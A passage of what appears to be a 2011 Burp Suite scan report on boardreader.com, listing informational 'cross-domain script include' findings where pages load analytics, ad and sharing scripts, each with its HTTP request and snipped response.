Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:16:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verify-v
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.65. http://boardreader.com/last-searches.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/last-searches.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://www.google-analytics.com/urchin.js

Request

GET /last-searches.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:22:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verify-v
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.66. http://boardreader.com/linkinfo/2mdn.net previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/linkinfo/2mdn.net

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /linkinfo/2mdn.net HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:15:40 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>2mdn.n
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.67. http://boardreader.com/my.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/my.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:03:54 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.68. http://boardreader.com/my/signup.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/my/signup.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /my/signup.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:04:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.69. http://boardreader.com/s/2mdn.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/s/2mdn.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&publisher=5f0bf72d-eb5b-476f-a6e4-c2e14b32d64c&style=rotate
http://www.google-analytics.com/urchin.js
http://www.google.com/afsonline/show_afs_ads.js

Request

GET /s/2mdn.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:15:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close


                                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta
...[SNIP]...
<td class="adv-icon share" id="sharethisInner"><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&publisher=5f0bf72d-eb5b-476f-a6e4-c2e14b32d64c&style=rotate"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/afsonline/show_afs_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.70. http://boardreader.com/site/Monterey_military_Group_CafeMo_764716.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/site/Monterey_military_Group_CafeMo_764716.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /site/Monterey_military_Group_CafeMo_764716.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:08:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.71. http://boardreader.com/site/Nolan_Fans_Forums_8842059.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/site/Nolan_Fans_Forums_8842059.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /site/Nolan_Fans_Forums_8842059.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:09:59 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.72. http://boardreader.com/site/RateDesi_Forums_13026.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/site/RateDesi_Forums_13026.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /site/RateDesi_Forums_13026.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:13:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.73. http://boardreader.com/site/Research_Learn_Message_Boards_1404604.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/site/Research_Learn_Message_Boards_1404604.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /site/Research_Learn_Message_Boards_1404604.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:12:34 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:12:47 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.74. http://boardreader.com/site/Sherdog_Mixed_Martial_Arts_For_14952.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/site/Sherdog_Mixed_Martial_Arts_For_14952.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /site/Sherdog_Mixed_Martial_Arts_For_14952.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:09:07 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.75. http://boardreader.com/site/The_CafeMom_Newcomers_Club_Gro_655408.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/site/The_CafeMom_Newcomers_Club_Gro_655408.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /site/The_CafeMom_Newcomers_Club_Gro_655408.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:08:38 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.76. http://boardreader.com/site/The_Mastiff_Sweet_Spot_6024491.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/site/The_Mastiff_Sweet_Spot_6024491.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /site/The_Mastiff_Sweet_Spot_6024491.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:10:07 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.77. http://boardreader.com/site/UFC_Community_Forum_9057873.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/site/UFC_Community_Forum_9057873.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /site/UFC_Community_Forum_9057873.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:13:12 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.78. http://boardreader.com/site/Ultimate_College_Softball_5898982.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/site/Ultimate_College_Softball_5898982.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /site/Ultimate_College_Softball_5898982.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:09:05 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:09:05 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.79. http://boardreader.com/site/mntdiat_mai_aigi_7486781.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/site/mntdiat_mai_aigi_7486781.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /site/mntdiat_mai_aigi_7486781.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:09:04 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.80. http://boardreader.com/top-searches/now.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/top-searches/now.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://www.google-analytics.com/urchin.js

Request

GET /top-searches/now.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
